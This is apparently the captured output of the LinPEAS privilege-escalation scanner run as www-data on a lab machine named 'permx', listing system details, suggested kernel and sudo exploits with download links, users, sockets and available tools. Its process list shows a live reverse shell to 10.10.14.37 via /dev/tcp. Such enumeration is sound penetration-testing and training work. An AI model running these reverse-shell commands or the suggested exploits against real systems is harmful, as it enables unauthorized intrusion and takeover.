www-data@permx:/tmp$ ./linpeas.sh



                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Learn Cloud Hacking       :     https://training.hacktricks.xyz         |
    |         Follow on Twitter         :     @hacktricks_live                        |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          LinPEAS-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 5.15.0-113-generic (buildd@lcy02-amd64-072) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: permx

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
uniq: write error: Broken pipe
DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
Linux version 5.15.0-113-generic (buildd@lcy02-amd64-072) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024
Distributor ID:	Ubuntu
Description:	Ubuntu 22.04.4 LTS
Release:	22.04
Codename:	jammy

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.9


╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

╔══════════╣ Date & uptime
Fri Sep 19 07:05:35 UTC 2025
 07:05:35 up 30 min,  0 users,  load average: 0.83, 0.31, 0.11

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-G9JfyTDyqZdEgu8qAdDGYPvUGYpl4trHM8Gq5gE72gVsAGqdOQ8TARA7taeEw2XF / ext4 defaults 0 1
/dev/disk/by-uuid/1625d5cd-48f4-4b77-a662-50503813a349 /boot ext4 defaults 0 1
/dev/mapper/ubuntu--vg-swap	none	swap	sw	0	0
proc	/proc	proc	defaults,hidepid=2	0	0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3

╔══════════╣ Environment
╚ Any private information inside environment variables?
SHLVL=3
OLDPWD=/var/www/chamilo
LC_CTYPE=C.UTF-8
APACHE_RUN_DIR=/var/run/apache2
SYSTEMD_EXEC_PID=1113
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=7:24666
_=./linpeas.sh
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
INVOCATION_ID=4ef1924b2298480381708f8f64e70bea
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
/usr/bin/curl
Learn and practice cloud hacking techniques in training.hacktricks.xyz

═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users
www-data    1478  0.0  0.0   2892   980 ?        S    06:48   0:00 sh -c /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.37/443 0>&1'
www-data    1479  0.0  0.0   4364  3208 ?        S    06:48   0:00  _ /bin/bash -c bash -i >& /dev/tcp/10.10.14.37/443 0>&1
www-data    1480  0.0  0.0   4628  3812 ?        S    06:48   0:00      _ bash -i
www-data    1485  0.0  0.2  17968  9472 ?        S    06:49   0:00          _ python3 -c import pty; pty.spawn("/bin/bash")
www-data    1486  0.0  0.1   7984  4060 pts/0    Ss   06:49   0:00              _ /bin/bash
www-data    4550  0.1  0.0   4064  2912 pts/0    S+   07:04   0:00                  _ /bin/sh ./linpeas.sh
www-data    7687  0.0  0.0   4064  1264 pts/0    S+   07:06   0:00                      _ /bin/sh ./linpeas.sh
www-data    7689  0.0  0.0  10420  1584 pts/0    R+   07:06   0:00                      |   _ ps fauxwww
www-data    7691  0.0  0.0   4064  1264 pts/0    S+   07:06   0:00                      _ /bin/sh ./linpeas.sh


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found

╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 1478 with ppid 1287 is run by user www-data but the ppid user is 

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1136 Sep 19 07:06 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder
-rw-r--r--   1 root root  201 Jan  8  2022 e2scrub_all
-rw-r--r--   1 root root  712 Jan  9  2024 php

/etc/cron.daily:
total 36
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder
-rwxr-xr-x   1 root root  539 May  3  2023 apache2
-rwxr-xr-x   1 root root  376 Nov 11  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  8  2022 apt-compat
-rwxr-xr-x   1 root root  123 Dec  5  2021 dpkg
-rwxr-xr-x   1 root root  377 May 25  2022 logrotate
-rwxr-xr-x   1 root root 1330 Mar 17  2022 man-db

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder
-rwxr-xr-x   1 root root 1020 Mar 17  2022 man-db

SHELL=/bin/sh

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ System timers
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers
NEXT                        LEFT           LAST                        PASSED              UNIT                           ACTIVATES
Fri 2025-09-19 07:09:00 UTC 2min 30s left  Fri 2025-09-19 06:39:04 UTC 27min ago           phpsessionclean.timer          phpsessionclean.service
Fri 2025-09-19 07:35:59 UTC 29min left     Mon 2024-07-01 11:58:06 UTC 1 year 2 months ago fstrim.timer                   fstrim.service
Fri 2025-09-19 09:35:53 UTC 2h 29min left  Mon 2024-07-01 12:23:18 UTC 1 year 2 months ago motd-news.timer                motd-news.service
Fri 2025-09-19 13:16:38 UTC 6h left        Sat 2024-01-20 18:10:52 UTC 1 year 7 months ago apt-daily.timer                apt-daily.service
Fri 2025-09-19 16:16:22 UTC 9h left        Sat 2024-01-20 18:10:52 UTC 1 year 7 months ago fwupd-refresh.timer            fwupd-refresh.service
Sat 2025-09-20 00:00:00 UTC 16h left       n/a                         n/a                 dpkg-db-backup.timer           dpkg-db-backup.service
Sat 2025-09-20 00:00:00 UTC 16h left       Fri 2025-09-19 06:34:51 UTC 31min ago           logrotate.timer                logrotate.service
Sat 2025-09-20 06:39:47 UTC 23h left       Fri 2025-09-19 06:39:47 UTC 26min ago           update-notifier-download.timer update-notifier-download.service
Sat 2025-09-20 06:49:47 UTC 23h left       Fri 2025-09-19 06:49:47 UTC 16min ago           systemd-tmpfiles-clean.timer   systemd-tmpfiles-clean.service
Sat 2025-09-20 06:50:32 UTC 23h left       Fri 2025-09-19 07:05:20 UTC 1min 8s ago         apt-daily-upgrade.timer        apt-daily-upgrade.service
Sat 2025-09-20 07:05:00 UTC 23h left       Fri 2025-09-19 06:50:11 UTC 16min ago           man-db.timer                   man-db.service
Sun 2025-09-21 03:10:04 UTC 1 day 20h left Fri 2025-09-19 06:34:54 UTC 31min ago           e2scrub_all.timer              e2scrub_all.service
Thu 2025-09-25 12:45:39 UTC 6 days left    Sat 2024-01-20 18:10:52 UTC 1 year 7 months ago update-notifier-motd.timer     update-notifier-motd.service
n/a                         n/a            n/a                         n/a                 apport-autoreport.timer        apport-autoreport.service
n/a                         n/a            n/a                         n/a                 ua-timer.timer                 ua-timer.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
sed: -e expression #1, char 0: no previous regular expression
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance/irqbalance824.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/inaccessible/sock
/run/systemd/io.system.ManagedOOM
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/resolve/io.systemd.Resolve
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
NAME                           PID PROCESS USER             CONNECTION    UNIT SESSION DESCRIPTION
:1.0                           758 n/a     systemd-timesync :1.0          -    -       -
:1.1                           574 n/a     systemd-network  :1.1          -    -       -
:1.2                           755 n/a     systemd-resolve  :1.2          -    -       -
:1.20                         9973 busctl  www-data         :1.20         -    -       -
:1.3                           829 n/a     root             :1.3          -    -       -
:1.4                           837 n/a     root             :1.4          -    -       -
:1.5                             1 n/a     root             :1.5          -    -       -
:1.6                           833 n/a     root             :1.6          -    -       -
:1.7                           886 n/a     root             :1.7          -    -       -
:1.9                           828 n/a     root             :1.9          -    -       -
com.ubuntu.SoftwareProperties    - -       -                (activatable) -    -       -
org.freedesktop.DBus             1 n/a     root             -             -    -       -
org.freedesktop.ModemManager1  886 n/a     root             :1.7          -    -       -
org.freedesktop.PackageKit       - -       -                (activatable) -    -       -
org.freedesktop.PolicyKit1     829 n/a     root             :1.3          -    -       -
org.freedesktop.UDisks2        837 n/a     root             :1.4          -    -       -
org.freedesktop.UPower           - -       -                (activatable) -    -       -
org.freedesktop.bolt             - -       -                (activatable) -    -       -
org.freedesktop.fwupd            - -       -                (activatable) -    -       -
org.freedesktop.hostname1        - -       -                (activatable) -    -       -
org.freedesktop.locale1          - -       -                (activatable) -    -       -
org.freedesktop.login1         833 n/a     root             :1.6          -    -       -
org.freedesktop.network1       574 n/a     systemd-network  :1.1          -    -       -
org.freedesktop.resolve1       755 n/a     systemd-resolve  :1.2          -    -       -
org.freedesktop.systemd1         1 n/a     root             :1.5          -    -       -
org.freedesktop.thermald         - -       -                (activatable) -    -       -
org.freedesktop.timedate1        - -       -                (activatable) -    -       -
org.freedesktop.timesync1      758 n/a     systemd-timesync :1.0          -    -       -
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)



                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.23  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb0:545a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb0:545a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b0:54:5a  txqueuelen 1000  (Ethernet)
        RX packets 93730  bytes 11818074 (11.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 92005  bytes 17895303 (17.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1440  bytes 116802 (116.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1440  bytes 116802 (116.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Hostname, hosts and DNS
permx
127.0.0.1 localhost
127.0.1.1 permx

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0 trust-ad
search .

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid


╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is enabled (1)

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(mtz) gid=1000(mtz) groups=1000(mtz)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=104(systemd-timesync) gid=105(systemd-timesync) groups=105(systemd-timesync)
uid=105(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(syslog) gid=113(syslog) groups=113(syslog),4(adm)
uid=108(uuidd) gid=114(uuidd) groups=114(uuidd)
uid=109(tcpdump) gid=115(tcpdump) groups=115(tcpdump)
uid=110(tss) gid=116(tss) groups=116(tss)
uid=111(landscape) gid=117(landscape) groups=117(landscape)
uid=112(fwupd-refresh) gid=118(fwupd-refresh) groups=118(fwupd-refresh)
uid=113(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=114(mysql) gid=120(mysql) groups=120(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(lxd) gid=100(users) groups=100(users)

╔══════════╣ Login now
 07:06:33 up 31 min,  0 users,  load average: 0.78, 0.36, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
reboot   system boot  Mon Jul  1 13:07:14 2024 - Mon Jul  1 13:09:59 2024  (00:02)     0.0.0.0
mtz      pts/0        Mon Jul  1 12:05:12 2024 - Mon Jul  1 13:06:56 2024  (01:01)     10.10.14.40
reboot   system boot  Mon Jul  1 12:04:51 2024 - Mon Jul  1 13:06:58 2024  (01:02)     0.0.0.0
mtz      pts/0        Mon Jul  1 11:53:22 2024 - Mon Jul  1 12:04:10 2024  (00:10)     10.10.14.40
mtz      pts/0        Mon Jul  1 11:49:41 2024 - Mon Jul  1 11:49:55 2024  (00:00)     10.10.14.40
reboot   system boot  Mon Jul  1 11:46:17 2024 - Mon Jul  1 12:04:12 2024  (00:17)     0.0.0.0
mtz      pts/0        Fri Jun  7 14:49:16 2024 - Fri Jun  7 14:54:29 2024  (00:05)     10.10.14.40
reboot   system boot  Fri Jun  7 14:48:49 2024 - Fri Jun  7 14:54:30 2024  (00:05)     0.0.0.0

wtmp begins Fri Jun  7 14:48:49 2024

╔══════════╣ Last time logon each user
Username         Port     From             Latest
mtz              pts/0    10.10.14.40      Mon Jul  1 13:09:13 +0000 2024

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
